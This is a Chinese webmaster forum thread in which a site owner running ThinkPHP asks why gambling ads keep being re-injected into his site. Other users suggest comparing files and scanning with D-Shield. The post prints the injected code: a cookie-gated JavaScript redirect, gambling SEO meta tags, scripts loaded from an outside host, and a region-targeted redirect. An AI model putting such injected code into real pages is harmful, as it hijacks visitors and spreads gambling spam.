shanjie89 大佬有话说 : 2020-1-3 10:22:09
官网被人插入了恶意广告,删除后没多久自动又被加上了
本帖最后由 shanjie89 于 2020-1-3 10:53 编辑
官网被人插入了恶意广告,删除后没多久自动又被加上了
阿里云服务器:centos
偷懒装了宝塔
ThinkPHP、后台使用TPAdmin
官网被人插入了恶意广告(index跳indax),删除了,没多久又加上了(怀疑是自动的),有没有人碰到过
通过对比文件,成功找到木马
不过我就是好奇,他是怎么自动来挂马的,总不能几小时登陆一次吧
而且他替换的还是我之前的官网,并不是直接在新的官网上修改(因为最近修改了一下官网页面)
JS文件也被增加了
var c = document.cookie;
if (c.indexOf(‘isfirstvisited=false’) != -1) {
}
else {
var d = new Date();
d.setFullYear(d.getFullYear() + 1);
document.cookie = ‘isfirstvisited=false;expires=’ + d.toGMTString();
window.location.;
}
如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>2020欧洲杯外围-2020欧洲杯足球竞猜</title>
<meta name="keywords" content="欧洲杯外围投注网,欧洲杯投注,欧洲杯竞猜投注,欧洲杯网上投注,2020欧洲杯赛事"/>
<meta name="description"
content="365bet体育是中国知名的体育门户网站【6126ok.com】,主要为您提供以下栏目:国内足球、国际足球、NBA、CBA、综合体育、世界杯、欧洲杯、欧冠杯、西甲、英超、意甲、法甲、德甲比分、直播、彩票、竞猜等,开户送彩金,更多优惠活动等你来!"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="官网"}</script>
<script language="javascript" src="https://www.bcdas8.com/dq.js"></script>
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("浙江省")>=0){window.location.href="/indax.html";}</script>
<script language="javascript" src="https://www.bcdas8.com/365301.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<script>
document.write(‘<link rel="stylesheet" href="./static/index/css/public.min.css?v=’ + new Date() + ‘"></link>’ +
‘<link rel="stylesheet" href="./static/index/css/index.min.css?v=’ + new Date() + ‘"></link>’)
</script>
</head>
kenutu 大佬有话说 : 2020-1-3 11:17:08
ApkB 大佬有话说 : 2020-1-3 11:03
PHP的锅,稳稳的
ThinkPHP 的锅,我有个淘宝客,用的是推券客,直接被干了两次,现在换到了LINUNX,还不知道咋样呢,回头看看,重点是WINDOWS 运行PHP。
hdwz 大佬有话说 : 2020-1-3 10:23:47
不亮CMS 谁知道
w187023 大佬有话说 : 2020-1-3 10:23:24
先把源码下载 杀毒 纯静态运行
hehe 大佬有话说 : 2020-1-3 10:23:33
联系我帮你搞定
shanjie89 大佬有话说 : 2020-1-3 10:29:30
hdwz 大佬有话说 : 2020-1-3 10:23
不亮CMS 谁知道
ThinkPHP写的后端
TPAdmin做的后台
A23187 大佬有话说 : 2020-1-3 10:29:59
网址呢?
hdwz 大佬有话说 : 2020-1-3 10:31:26
那就只能比对文件了。 看看和你初始包的文件那个不一样
voleta 大佬有话说 : 2020-1-3 10:41:26
源码 下载下来 用D盾扫下看看咯
ApkB 大佬有话说 : 2020-1-3 11:03:45
PHP的锅,稳稳的 :lol
BOC 大佬有话说 : 2020-1-3 11:10:26
java同样中招,不知道是啥(换服务器也不行,好像针对域名注入的),给我弄一些js和样式,妈的,让我直接写了一个3秒的定时器,不停的扫描移除元素